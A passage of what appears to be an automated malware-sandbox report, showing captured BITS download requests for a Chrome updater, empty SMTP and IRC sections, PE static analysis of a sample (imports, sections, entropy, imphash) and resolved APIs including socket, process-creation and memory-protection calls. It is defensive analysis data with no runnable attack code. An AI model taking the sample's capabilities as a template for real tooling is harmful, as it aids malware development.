  718. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=18438939-19888021\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  719. "port": 80
  720. },
  721. {
  722. "count": 1,
  723. "body": "",
  724. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  725. "user-agent": "Microsoft BITS/7.5",
  726. "method": "GET",
  727. "host": "r5---sn-tt1e7n7e.gvt1.com",
  728. "version": "1.1",
  729. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  730. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=19888022-20811638\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  731. "port": 80
  732. },
  733. {
  734. "count": 1,
  735. "body": "",
  736. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  737. "user-agent": "Microsoft BITS/7.5",
  738. "method": "GET",
  739. "host": "r5---sn-tt1e7n7e.gvt1.com",
  740. "version": "1.1",
  741. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  742. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=20811639-22252440\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  743. "port": 80
  744. },
  745. {
  746. "count": 1,
  747. "body": "",
  748. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  749. "user-agent": "Microsoft BITS/7.5",
  750. "method": "GET",
  751. "host": "r5---sn-tt1e7n7e.gvt1.com",
  752. "version": "1.1",
  753. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  754. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=22252441-23705723\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  755. "port": 80
  756. },
  757. {
  758. "count": 1,
  759. "body": "",
  760. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  761. "user-agent": "Microsoft BITS/7.5",
  762. "method": "GET",
  763. "host": "r5---sn-tt1e7n7e.gvt1.com",
  764. "version": "1.1",
  765. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  766. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=23705724-25236904\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  767. "port": 80
  768. },
  769. {
  770. "count": 1,
  771. "body": "",
  772. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  773. "user-agent": "Microsoft BITS/7.5",
  774. "method": "GET",
  775. "host": "r5---sn-tt1e7n7e.gvt1.com",
  776. "version": "1.1",
  777. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  778. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=25236905-26834675\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  779. "port": 80
  780. },
  781. {
  782. "count": 1,
  783. "body": "",
  784. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  785. "user-agent": "Microsoft BITS/7.5",
  786. "method": "GET",
  787. "host": "r5---sn-tt1e7n7e.gvt1.com",
  788. "version": "1.1",
  789. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  790. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=26834676-27861757\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  791. "port": 80
  792. },
  793. {
  794. "count": 1,
  795. "body": "",
  796. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  797. "user-agent": "Microsoft BITS/7.5",
  798. "method": "GET",
  799. "host": "r5---sn-tt1e7n7e.gvt1.com",
  800. "version": "1.1",
  801. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  802. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=27861758-29675521\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  803. "port": 80
  804. },
  805. {
  806. "count": 1,
  807. "body": "",
  808. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  809. "user-agent": "Microsoft BITS/7.5",
  810. "method": "GET",
  811. "host": "r5---sn-tt1e7n7e.gvt1.com",
  812. "version": "1.1",
  813. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  814. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=29675522-30336767\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  815. "port": 80
  816. }
  817. ]
  818.  
  819. [*] Network Communication - SMTP: []
  820.  
  821. [*] Network Communication - Hosts: []
  822.  
  823. [*] Network Communication - IRC: []
  824.  
  825. [*] Static Analysis: {
  826. "pe": {
  827. "peid_signatures": null,
  828. "imports": [
  829. {
  830. "imports": [
  831. {
  832. "name": "VirtualAllocEx",
  833. "address": "0x41d00c"
  834. },
  835. {
  836. "name": "GetCommandLineW",
  837. "address": "0x41d010"
  838. },
  839. {
  840. "name": "GetOEMCP",
  841. "address": "0x41d014"
  842. },
  843. {
  844. "name": "GetCommandLineA",
  845. "address": "0x41d018"
  846. },
  847. {
  848. "name": "GetProcAddress",
  849. "address": "0x41d01c"
  850. },
  851. {
  852. "name": "LoadLibraryA",
  853. "address": "0x41d020"
  854. },
  855. {
  856. "name": "GetLastError",
  857. "address": "0x41d024"
  858. },
  859. {
  860. "name": "GetModuleHandleA",
  861. "address": "0x41d028"
  862. },
  863. {
  864. "name": "GetCurrentProcess",
  865. "address": "0x41d02c"
  866. },
  867. {
  868. "name": "GetProcessHeap",
  869. "address": "0x41d030"
  870. },
  871. {
  872. "name": "InterlockedIncrement",
  873. "address": "0x41d034"
  874. },
  875. {
  876. "name": "lstrlenA",
  877. "address": "0x41d038"
  878. },
  879. {
  880. "name": "GetVersionExA",
  881. "address": "0x41d03c"
  882. },
  883. {
  884. "name": "GetVersionExW",
  885. "address": "0x41d040"
  886. },
  887. {
  888. "name": "InterlockedDecrement",
  889. "address": "0x41d044"
  890. },
  891. {
  892. "name": "GetCurrentThread",
  893. "address": "0x41d048"
  894. },
  895. {
  896. "name": "GetTickCount",
  897. "address": "0x41d04c"
  898. },
  899. {
  900. "name": "GetStartupInfoW",
  901. "address": "0x41d050"
  902. }
  903. ],
  904. "dll": "KERNEL32.dll"
  905. },
  906. {
  907. "imports": [
  908. {
  909. "name": "DestroyWindow",
  910. "address": "0x41d058"
  911. },
  912. {
  913. "name": "RegisterClassW",
  914. "address": "0x41d05c"
  915. },
  916. {
  917. "name": "LoadIconA",
  918. "address": "0x41d060"
  919. },
  920. {
  921. "name": "SetWindowLongW",
  922. "address": "0x41d064"
  923. },
  924. {
  925. "name": "SetWindowTextW",
  926. "address": "0x41d068"
  927. },
  928. {
  929. "name": "DefWindowProcW",
  930. "address": "0x41d06c"
  931. },
  932. {
  933. "name": "CreateWindowExA",
  934. "address": "0x41d070"
  935. },
  936. {
  937. "name": "DestroyIcon",
  938. "address": "0x41d074"
  939. },
  940. {
  941. "name": "SendMessageW",
  942. "address": "0x41d078"
  943. },
  944. {
  945. "name": "CreateWindowExW",
  946. "address": "0x41d07c"
  947. },
  948. {
  949. "name": "UnregisterClassA",
  950. "address": "0x41d080"
  951. },
  952. {
  953. "name": "LoadStringW",
  954. "address": "0x41d084"
  955. },
  956. {
  957. "name": "PostMessageW",
  958. "address": "0x41d088"
  959. }
  960. ],
  961. "dll": "USER32.dll"
  962. },
  963. {
  964. "imports": [
  965. {
  966. "name": "CreateDIBSection",
  967. "address": "0x41d000"
  968. },
  969. {
  970. "name": "CreateBitmap",
  971. "address": "0x41d004"
  972. }
  973. ],
  974. "dll": "GDI32.dll"
  975. },
  976. {
  977. "imports": [
  978. {
  979. "name": "CoInitialize",
  980. "address": "0x41d0d8"
  981. },
  982. {
  983. "name": "CoGetObject",
  984. "address": "0x41d0dc"
  985. }
  986. ],
  987. "dll": "ole32.dll"
  988. },
  989. {
  990. "imports": [
  991. {
  992. "name": "__setusermatherr",
  993. "address": "0x41d090"
  994. },
  995. {
  996. "name": "_c_exit",
  997. "address": "0x41d094"
  998. },
  999. {
  1000. "name": "_except_handler3",
  1001. "address": "0x41d098"
  1002. },
  1003. {
  1004. "name": "_XcptFilter",
  1005. "address": "0x41d09c"
  1006. },
  1007. {
  1008. "name": "_cexit",
  1009. "address": "0x41d0a0"
  1010. },
  1011. {
  1012. "name": "exit",
  1013. "address": "0x41d0a4"
  1014. },
  1015. {
  1016. "name": "_wcmdln",
  1017. "address": "0x41d0a8"
  1018. },
  1019. {
  1020. "name": "__wgetmainargs",
  1021. "address": "0x41d0ac"
  1022. },
  1023. {
  1024. "name": "_initterm",
  1025. "address": "0x41d0b0"
  1026. },
  1027. {
  1028. "name": "_exit",
  1029. "address": "0x41d0b4"
  1030. },
  1031. {
  1032. "name": "_adjust_fdiv",
  1033. "address": "0x41d0b8"
  1034. },
  1035. {
  1036. "name": "__p__commode",
  1037. "address": "0x41d0bc"
  1038. },
  1039. {
  1040. "name": "__p__fmode",
  1041. "address": "0x41d0c0"
  1042. },
  1043. {
  1044. "name": "__set_app_type",
  1045. "address": "0x41d0c4"
  1046. },
  1047. {
  1048. "name": "_controlfp",
  1049. "address": "0x41d0c8"
  1050. },
  1051. {
  1052. "name": "__dllonexit",
  1053. "address": "0x41d0cc"
  1054. },
  1055. {
  1056. "name": "_onexit",
  1057. "address": "0x41d0d0"
  1058. }
  1059. ],
  1060. "dll": "msvcrt.dll"
  1061. }
  1062. ],
  1063. "digital_signers": null,
  1064. "exported_dll_name": null,
  1065. "actual_checksum": "0x0001d0b3",
  1066. "overlay": {
  1067. "size": "0x00001f08",
  1068. "offset": "0x0000c000"
  1069. },
  1070. "imagebase": "0x00400000",
  1071. "reported_checksum": "0x0001d0b3",
  1072. "icon_hash": null,
  1073. "entrypoint": "0x00404636",
  1074. "timestamp": "2016-08-19 14:55:52",
  1075. "osversion": "4.0",
  1076. "sections": [
  1077. {
  1078. "name": ".text",
  1079. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1080. "virtual_address": "0x00001000",
  1081. "size_of_data": "0x00004000",
  1082. "entropy": "5.74",
  1083. "raw_address": "0x00001000",
  1084. "virtual_size": "0x00003916",
  1085. "characteristics_raw": "0xf0000020"
  1086. },
  1087. {
  1088. "name": ".bss",
  1089. "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1090. "virtual_address": "0x00005000",
  1091. "size_of_data": "0x00000000",
  1092. "entropy": "0.00",
  1093. "raw_address": "0x00000000",
  1094. "virtual_size": "0x00017030",
  1095. "characteristics_raw": "0xc0000080"
  1096. },
  1097. {
  1098. "name": ".rdata",
  1099. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  1100. "virtual_address": "0x0001d000",
  1101. "size_of_data": "0x00001000",
  1102. "entropy": "2.45",
  1103. "raw_address": "0x00005000",
  1104. "virtual_size": "0x000005dc",
  1105. "characteristics_raw": "0x40000040"
  1106. },
  1107. {
  1108. "name": ".data",
  1109. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1110. "virtual_address": "0x0001e000",
  1111. "size_of_data": "0x00005000",
  1112. "entropy": "6.48",
  1113. "raw_address": "0x00006000",
  1114. "virtual_size": "0x00004ef4",
  1115. "characteristics_raw": "0xd0000040"
  1116. },
  1117. {
  1118. "name": ".reloc",
  1119. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
  1120. "virtual_address": "0x00023000",
  1121. "size_of_data": "0x00001000",
  1122. "entropy": "0.70",
  1123. "raw_address": "0x0000b000",
  1124. "virtual_size": "0x0000024e",
  1125. "characteristics_raw": "0x42000040"
  1126. }
  1127. ],
  1128. "resources": [],
  1129. "dirents": [
  1130. {
  1131. "virtual_address": "0x00000000",
  1132. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  1133. "size": "0x00000000"
  1134. },
  1135. {
  1136. "virtual_address": "0x0001d104",
  1137. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  1138. "size": "0x00000078"
  1139. },
  1140. {
  1141. "virtual_address": "0x00000000",
  1142. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  1143. "size": "0x00000000"
  1144. },
  1145. {
  1146. "virtual_address": "0x00000000",
  1147. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  1148. "size": "0x00000000"
  1149. },
  1150. {
  1151. "virtual_address": "0x0000c000",
  1152. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  1153. "size": "0x00001f08"
  1154. },
  1155. {
  1156. "virtual_address": "0x00023000",
  1157. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  1158. "size": "0x0000011c"
  1159. },
  1160. {
  1161. "virtual_address": "0x00000000",
  1162. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  1163. "size": "0x00000000"
  1164. },
  1165. {
  1166. "virtual_address": "0x00000000",
  1167. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  1168. "size": "0x00000000"
  1169. },
  1170. {
  1171. "virtual_address": "0x00000000",
  1172. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  1173. "size": "0x00000000"
  1174. },
  1175. {
  1176. "virtual_address": "0x00000000",
  1177. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  1178. "size": "0x00000000"
  1179. },
  1180. {
  1181. "virtual_address": "0x00000000",
  1182. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  1183. "size": "0x00000000"
  1184. },
  1185. {
  1186. "virtual_address": "0x00000000",
  1187. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  1188. "size": "0x00000000"
  1189. },
  1190. {
  1191. "virtual_address": "0x0001d000",
  1192. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  1193. "size": "0x000000e4"
  1194. },
  1195. {
  1196. "virtual_address": "0x00000000",
  1197. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  1198. "size": "0x00000000"
  1199. },
  1200. {
  1201. "virtual_address": "0x00000000",
  1202. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  1203. "size": "0x00000000"
  1204. },
  1205. {
  1206. "virtual_address": "0x00000000",
  1207. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  1208. "size": "0x00000000"
  1209. }
  1210. ],
  1211. "exports": [],
  1212. "guest_signers": {},
  1213. "imphash": "ed3432959df410bdf8d52780a8c0d1d3",
  1214. "icon_fuzzy": null,
  1215. "icon": null,
  1216. "pdbpath": null,
  1217. "imported_dll_count": 5,
  1218. "versioninfo": []
  1219. }
  1220. }
  1221.  
  1222. [*] Resolved APIs: [
  1223. "cryptbase.dll.SystemFunction036",
  1224. "uxtheme.dll.ThemeInitApiHook",
  1225. "user32.dll.IsProcessDPIAware",
  1226. "user32.dll.GetWindowContextHelpId",
  1227. "kernel32.dll.VirtualAlloc",
  1228. "kernel32.dll.VirtualProtect",
  1229. "kernel32.dll.LoadLibraryA",
  1230. "kernel32.dll.VirtualFree",
  1231. "kernel32.dll.VirtualQuery",
  1232. "advapi32.dll.GetUserNameA",
  1233. "kernel32.dll.AddAtomA",
  1234. "kernel32.dll.CloseHandle",
  1235. "kernel32.dll.CreateDirectoryA",
  1236. "kernel32.dll.CreateFileA",
  1237. "kernel32.dll.CreateProcessA",
  1238. "kernel32.dll.ExitProcess",
  1239. "kernel32.dll.FindAtomA",
  1240. "kernel32.dll.FreeLibrary",
  1241. "kernel32.dll.GetAtomNameA",
  1242. "kernel32.dll.GetComputerNameA",
  1243. "kernel32.dll.GetFileAttributesA",
  1244. "kernel32.dll.GetFileSize",
  1245. "kernel32.dll.GetModuleFileNameA",
  1246. "kernel32.dll.GetModuleHandleA",
  1247. "kernel32.dll.GetProcAddress",
  1248. "kernel32.dll.GetSystemDirectoryA",
  1249. "kernel32.dll.GetSystemInfo",
  1250. "kernel32.dll.GetTempPathA",
  1251. "kernel32.dll.GetVersionExA",
  1252. "kernel32.dll.GetVolumeInformationA",
  1253. "kernel32.dll.SetUnhandledExceptionFilter",
  1254. "kernel32.dll.Sleep",
  1255. "kernel32.dll.WaitForSingleObject",
  1256. "kernel32.dll.WriteFile",
  1257. "msvcrt.dll._itoa",
  1258. "msvcrt.dll._strlwr",
  1259. "msvcrt.dll.__getmainargs",
  1260. "msvcrt.dll.__p__environ",
  1261. "msvcrt.dll.__p__fmode",
  1262. "msvcrt.dll.__set_app_type",
  1263. "msvcrt.dll._cexit",
  1264. "msvcrt.dll._iob",
  1265. "msvcrt.dll._onexit",
  1266. "msvcrt.dll._setmode",
  1267. "msvcrt.dll.abort",
  1268. "msvcrt.dll.atexit",
  1269. "msvcrt.dll.atoi",
  1270. "msvcrt.dll.exit",
  1271. "msvcrt.dll.fclose",
  1272. "msvcrt.dll.fflush",
  1273. "msvcrt.dll.fopen",
  1274. "msvcrt.dll.fprintf",
  1275. "msvcrt.dll.fread",
  1276. "msvcrt.dll.free",
  1277. "msvcrt.dll.fwrite",
  1278. "msvcrt.dll.malloc",
  1279. "msvcrt.dll.memcpy",
  1280. "msvcrt.dll.memmove",
  1281. "msvcrt.dll.memset",
  1282. "msvcrt.dll.signal",
  1283. "msvcrt.dll.strcat",
  1284. "msvcrt.dll.strcmp",
  1285. "msvcrt.dll.strcpy",
  1286. "msvcrt.dll.strlen",
  1287. "msvcrt.dll.strncat",
  1288. "shell32.dll.ShellExecuteExA",
  1289. "user32.dll.GetSystemMetrics",
  1290. "wsock32.dll.WSACleanup",
  1291. "wsock32.dll.WSAStartup",
  1292. "wsock32.dll.closesocket",
  1293. "wsock32.dll.connect",
  1294. "wsock32.dll.gethostbyname",
  1295. "wsock32.dll.htons",
  1296. "wsock32.dll.inet_addr",
  1297. "wsock32.dll.inet_ntoa",
  1298. "wsock32.dll.recv",
  1299. "wsock32.dll.send",
  1300. "wsock32.dll.socket",
  1301. "shell32.dll.#680",
  1302. "kernel32.dll.GetNativeSystemInfo",
  1303. "kernel32.dll.SortGetHandle",
  1304. "kernel32.dll.SortCloseHandle"
  1305. ]
  1306.  
  1307. [*] Static Analysis: {
  1308. "pe": {
  1309. "peid_signatures": null,
  1310. "imports": [
  1311. {
  1312. "imports": [
  1313. {
  1314. "name": "VirtualAllocEx",
  1315. "address": "0x41d00c"
  1316. },
  1317. {
  1318. "name": "GetCommandLineW",
  1319. "address": "0x41d010"
  1320. },
  1321. {
  1322. "name": "GetOEMCP",
  1323. "address": "0x41d014"
  1324. },
  1325. {
  1326. "name": "GetCommandLineA",
  1327. "address": "0x41d018"
  1328. },
  1329. {
  1330. "name": "GetProcAddress",
  1331. "address": "0x41d01c"
  1332. },
  1333. {
  1334. "name": "LoadLibraryA",
  1335. "address": "0x41d020"
  1336. },
  1337. {
  1338. "name": "GetLastError",
  1339. "address": "0x41d024"
  1340. },
  1341. {
  1342. "name": "GetModuleHandleA",
  1343. "address": "0x41d028"
  1344. },
  1345. {
  1346. "name": "GetCurrentProcess",
  1347. "address": "0x41d02c"
  1348. },
  1349. {
  1350. "name": "GetProcessHeap",
  1351. "address": "0x41d030"
  1352. },
  1353. {
  1354. "name": "InterlockedIncrement",
  1355. "address": "0x41d034"
  1356. },
  1357. {
  1358. "name": "lstrlenA",
  1359. "address": "0x41d038"
  1360. },
  1361. {
  1362. "name": "GetVersionExA",
  1363. "address": "0x41d03c"
  1364. },
  1365. {
  1366. "name": "GetVersionExW",
  1367. "address": "0x41d040"
  1368. },
  1369. {
  1370. "name": "InterlockedDecrement",
  1371. "address": "0x41d044"
  1372. },
  1373. {
  1374. "name": "GetCurrentThread",
  1375. "address": "0x41d048"
  1376. },
  1377. {
  1378. "name": "GetTickCount",
  1379. "address": "0x41d04c"
  1380. },
  1381. {
  1382. "name": "GetStartupInfoW",
  1383. "address": "0x41d050"
  1384. }
  1385. ],
